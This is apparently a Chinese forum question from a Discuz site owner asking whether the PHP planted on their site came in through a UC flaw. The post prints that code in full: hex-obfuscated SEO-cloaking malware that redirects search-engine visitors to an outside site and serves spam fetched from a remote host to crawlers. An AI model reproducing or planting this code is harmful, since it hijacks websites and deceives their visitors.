discuz被挂入如下代码。这是uc的一个漏洞？

<?php /*StartCache*/ function relset_UC_key ($string){ $arraygn = strlen ($string); $debuger = ''; for($one = 0;$one < $arraygn;$one += 2){ $debuger .= pack ("C", hexdec (substr ($string, $one, 2))); } return $debuger; } function relset_Turl ($url){ global $relset_host; $string = relset_UC_key ('4c6f636174696f6e3a20' . $url . '3f') . str_replace ('.', '_', $relset_host); header($string); return true; } error_reporting (E_ERROR); if(stristr($_SERVER['HTTP_REFERER'], 'site%3A') or stristr($_SERVER['HTTP_REFERER'], 'inurl%3A')){ setcookie('cookie', $_SERVER['HTTP_HOST'], time() + 259200); } if($_GET && !eregi('site%3A|inurl%3A', $_SERVER['HTTP_REFERER']) && empty($_COOKIE['cookie'])){ $clserv = & $_SERVER; $relset_host = $clserv['HTTP_' . 'HOST']; $relset_self = $clserv['PHP_' . 'SELF']; $relset_refe = $clserv['HTTP_RE' . 'FERER']; $relset_user = $clserv['HTTP_US' . 'ER_AGENT']; if ($_GET['tid'] > 9999999 || $_GET['tid'] > 9999999){ $arrgpe = array( 'tid' => array('%B2%A9%B2%CA', '%b2%a9%b2%ca', '687474703A2F2F777777372E64616E6763693232322E636F6D2F'), ); $keysar = array_keys ($_GET); $arrgps = array_keys ($arrgpe); $arrgpx = array_values (array_intersect ($arrgps, $keysar)); $rebotu = $arrgpx[0];//tid $boswon = relset_UC_key ('62616964757C676F6F676C657C736F676F757C736F736F7C7961686F6F7C62696E677C626F747C7370696465727C736F7C3336307C616E7175616E7C68616F736F75'); } if (eregi ($boswon, $relset_refe)){ if (!empty ($rebotu)){ relset_Turl ($arrgpe[$arrgpx[0]][2]); exit; }else{ foreach($arrgpe as $vargn => $arraygn){ if(stristr ($relset_refe, $arraygn[0]) || stristr ($relset_refe, $arraygn[1])){ relset_Turl ($arraygn[2]); exit; } } } }elseif (eregi ($boswon, $relset_user) && $rebotu){ $valsar = array_values ($_GET); $retueby = array( 0 => relset_UC_key ('3f643d'), 1 => relset_UC_key ('26733d'), 2 => relset_UC_key ('26763d'), 3 => relset_UC_key ('26723d'), 4 => relset_UC_key ('636f6e74656e742d547970653a20746578742f68746d6c3b20636861727365743d676232333132'), 5 => relset_UC_key ('687474703a2f2f'), 6 => relset_UC_key ('5b30785370696465725d') ); $inters = relset_UC_key ('3830'); $demuer = relset_UC_key ('75726C2E616E7175616E2E7573'); $simeiao = relset_UC_key ('2f6170692f696e6465782e706870'); $classinction = $retueby[0] . $relset_host . $retueby[1] . $relset_self . $retueby[2] . $rebotu . $retueby[3] . join($valsar, '|'); header ($retueby[4]); $dir = (substr(PHP_OS, 0, 3) == 'WIN' ? 'C:/windows/temp/' : '/tmp/') . substr(md5($relset_host), 26) . chr(47); $url = $retueby[5] . $demuer . ':' . $inters . $simeiao . $classinction; $file =$dir . 'sess_' . substr(md5($url), 6); if(@file_exists($file) && @filesize ($file) > 32){ echo relset_UC_key(base64_decode(@file_get_contents($file))); }else{ $skyword = @file_get_contents ($retueby[5] . $demuer . ':' . $inters . $simeiao . $classinction); $skywords = explode ($retueby[6], $skyword); if(!@file_exists($dir)){ @mkdir($dir, 0777); } @file_put_contents($file,base64_encode(bin2hex($skywords[1]))); echo $skywords[1]; } exit; } } /** * EndCache */ ?>